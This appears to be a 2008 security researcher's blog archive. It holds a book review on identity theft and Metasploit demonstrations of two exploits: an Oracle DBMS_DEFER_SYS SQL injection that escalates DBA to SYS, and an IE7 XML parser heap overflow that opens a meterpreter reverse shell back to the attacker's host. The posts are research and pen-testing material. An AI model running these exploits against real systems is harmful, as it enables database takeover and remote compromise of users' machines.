Thursday, December 25, 2008

The Truth About Identity Theft Book Review

The Truth About Identity Theft Book Review

by Jim Stickley

4 stars

Witty (Hopefully) Amazon Title: Digestible Truths to Protect Yourself from Identity Theft

When this book showed up (review copy) I initially thought what a piece of garbage. Like a previous commenter said, the book has a lackluster cover and its small and skinny.
BUT, I flipped through and noticed that it contained lots of little "truths" 3-4 pages in length that quickly covered specific topics related to identity theft and protecting yourself online. So I decided to give it a shot.

The book is broken into 9 parts:

Part 1: The Truth About Phishing and Vishing
Part 2: The Truth About Trash
Part 3: The Truth About No-Tech Identity Theft
Part 4: The Truth About Just How Low Identity Thieves Will Go
Part 5: The Truth About Identity Theft in Plain Sight
Part 6: The Truth About Online Cons
Part 7: The Truth About Security at Work
Part 8: The Truth About Identity Theft from Real Victims
Part 9: The Truth About Putting a Stop to Identity Theft

Again, each part consists of several 3-4 page vignettes on topics related to the section and each vignette, while short, yields some actionable information on the topic. I didnt have any specific favorites, they were all good. Just about all of them were real world examples that they author conducted during security assessments or real life examples from people that had contacted the author or stories he had heard. Its sometimes much easier to emphasize with Susan who was a victim of identify theft and the troubles she was having trying to set things right. Of real value was the part on Putting a Stop to Identity Theft which tells you how to get rid of the pre-certified credit card offers, checking your credit reports, actions to take if you are a victim of identity theft and some of the pitfalls that can come up during the process.

So why 4 stars? Well mostly because I review technical security books it wouldn't be fair to give a less technical book that doesn't yield "new" (but still useful) information 5 stars when other more technical books are graded much harsher. So that being said, if I had approached it being a less technical reviewer I would have easily given it 5 stars. If you want to get a book for mom and dad to protect to help them protect themselves from themselves and the rest of the bad guys out there this is the book for them. Unfortunately I finished it too close to Xmas to give copies as gifts.


Monday, December 22, 2008

Oracle Pwnage Part 6 from DBA to SYS

In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages.

I've been neglecting the blog a bit porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when its going to be put into the trunk but it will be at some point, I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, so it being the week of Christmas or whatever you celebrate I thought I'd put out a module that has a vulnerability out but no exploit code.

So...coverage for:
http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER DBA NO YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL>

select user from dual;

USER
------------------------------
SYS

SQL>

Tested on 9i and 10g release 1

codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb

It's definitely a work in progress, so if you have feedback, send it.

Missing Add Remove Icon in Windows

Not really security related but notes for me if it comes up again...

Was doing some incident response on a Windows 2003 server, I needed to verify a service pack level and installed KB's via the add remove programs program but the icon was missing.

Found the answer on how to call it via the start-->run-->appwiz.cpl

http://en.kioskea.net/faq/sujet-465-the-add-remove-programs-icon-is-missing-in-control-panel


Thursday, December 11, 2008

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time it figuring out. It's pretty straight forward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the xml to cause a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an inital PoC working but it was not stable and only triggered on XP as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even though I tested last night and this morning it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
sf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational to say the least. I learned a lot from the debuggging and testing. Cheers mc!!

Now all I need is a target... ;)

Cheers,
/dean

**edit
IE7 Zero Day Technical Analysis


Sunday, December 7, 2008

Congrats To My Aura Software Security Friends

Just wanted to give a big congrats to my Aura Software Security friends over in New Zealand for the good things I'm hearing about their hacking netscreen talk.

"Netscreen of the Dead: Developing a Trojaned Firmware for Juniper Netscreen Appliances"

http://www.ruxcon.org.au/files/2008/gn-netscreen-of-the-dead.ppt


http://www.zdnet.com.au/news/security/soa/Ruxcon-security-gurus-hit-Sydney/0,130061744,339

293503,00.htm